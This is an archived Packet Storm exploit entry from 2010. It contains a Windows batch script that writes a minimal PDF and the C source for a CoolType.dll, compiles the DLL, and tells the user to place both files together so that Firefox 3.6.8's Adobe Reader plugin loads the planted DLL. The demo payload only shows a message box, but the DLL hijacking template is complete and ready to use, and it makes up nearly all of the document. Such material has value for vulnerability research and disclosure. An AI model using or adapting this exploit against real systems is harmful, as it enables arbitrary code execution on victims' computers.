Mozilla Firefox 3.6.8 Adobe Reader Plugin 9.3.4.218 DLL Hijacking Exploit

2010-08-28T00:00:00
ID PACKETSTORM:93246
Type packetstorm
Reporter Rh0
Modified 2010-08-28T00:00:00

Description

                                        
                                            `@echo off  
GOTO START  
  
* [*]  
* [*] Mozilla Firefox 3.6.8 Adobe Reader Plugin 9.3.4.218 DLL Hijacking Exploit (CoolType.dll)  
* [*]  
* [*] Author: Rh0 (Rh0[at]z1p.biz)  
* [*] Date: August 26, 2010  
* [*] Affected Software: Mozilla Firefox 3.6.8 with Adobe Reader Plugin 9.3.4.218  
* [*] Tested on: Windows XP Pro SP3 x86 En  
* [*] Description:  
*  
* Affected Extensions: .pdf .pdfxml .mars .fdf .xfdf .xdp .xfd  
*  
* When Firefox plugins are used, the necessary DLLs for the plugin to run  
* are searched in folders in the following order:  
*  
* mozilla firefox dir  
* windows system32 dir  
* windows system dir  
* windows dir  
* current dir <-- hijack possibility  
* plugin program dir  
*  
* Hence, depending on the actual file, the plugin and the needed DLLs, plugin DLLs can be hijacked.  
* just 2 examples for the Adobe Reader plugin:  
* CoolType.dll  
* authplay.dll (if the pdf contains an embedded swf file)  
*  
* This Batch File example creates an mininal pdf file, CoolType.c and  
* compiles it to CoolType.dll (gcc has to be installed).  
* When opening the pdf with Firefox, CoolType.dll gets executed, if both files are in the same directory.  
* So embedded pdf files in a html file could be used to hijack Adobe Reader DLLs.  
* For this exploit to work, Firefox and the Adober Reader 9.3.4 plugin have to be installed.  
* To test the other extensions simply change the extension of the pdf file, and open it with firefox  
  
  
:START  
  
echo.  
echo [*]   
  
echo [*] Creating pdf file...  
  
REM PDF FILENAME  
set pdf=OpenwithFirefox.pdf  
  
echo %%PDF-1.4>"%pdf%"  
echo %%Çìó¢>>"%pdf%"  
echo 1 0 obj ^<^< /Type /Catalog /ViewerPreferences ^<^< /NonFullScreenPageMode /UseNone ^>^> /PageLayout /SinglePage /Pages 2 0 R /PageMode /UseNone ^>^> endobj>>"%pdf%"  
echo 2 0 obj ^<^< /Type /Pages /Kids [ 5 0 R ] /Resources 3 0 R /Count 1 ^>^> endobj>>"%pdf%"  
echo 3 0 obj ^<^< /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] ^>^> endobj>>"%pdf%"  
echo 4 0 obj ^<^< /Producer (PDF::API2 0.69 [linux]) ^>^> endobj>>"%pdf%"  
echo 5 0 obj ^<^< /Type /Page /Parent 2 0 R /Resources ^<^< /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] ^>^> ^>^> endobj>>"%pdf%"  
echo xref>>"%pdf%"  
echo 0 6 >>"%pdf%"  
echo 0000000000 65535 f>>"%pdf%"  
echo 0000000015 00000 n>>"%pdf%"  
echo 0000000164 00000 n>>"%pdf%"  
echo 0000000240 00000 n>>"%pdf%"  
echo 0000000309 00000 n>>"%pdf%"   
echo 0000000365 00000 n>>"%pdf%"   
echo trailer>>"%pdf%"  
echo ^<^< /Root 1 0 R /Size 6 /Info 4 0 R ^>^>>>"%pdf%"  
echo startxref>>"%pdf%"  
echo 477>>"%pdf%"  
echo %%%%EOF>>"%pdf%"  
  
echo [*] %pdf% created.  
  
echo [*]  
  
echo [*] Creating CoolType.c source...  
  
REM PDF FILENAME  
set dllsrc=CoolType.c  
  
echo #include ^<windows.h^>>"%dllsrc%"  
echo #define DLLExport __declspec (dllexport)>>"%dllsrc%"  
echo int runme()>>"%dllsrc%"  
echo {>>"%dllsrc%"  
echo MessageBox(0, "Firefox with Adobe Reader Plugin DLL Hijacking", "Message from CoolType.dll", MB_OK);>>"%dllsrc%"  
echo return 0;>>"%dllsrc%"  
echo }>>"%dllsrc%"  
echo DLLExport void CTCleanup() { runme(); }>>"%dllsrc%"  
echo DLLExport void CTGetVersion() { runme(); }>>"%dllsrc%"  
echo DLLExport void CTInit() { runme(); }>>"%dllsrc%"  
echo [*] Done.  
  
echo [*] Compiling CoolType.dll...  
gcc -shared -o CoolType.dll CoolType.c  
  
echo [*] Done  
echo [*]  
echo [*] Copy "%pdf%" and CoolType.dll to the same   
echo [*] directory, open directory in windows explorer  
echo [*] and open "%pdf%" in Firefox.  
echo [*]  
pause  
`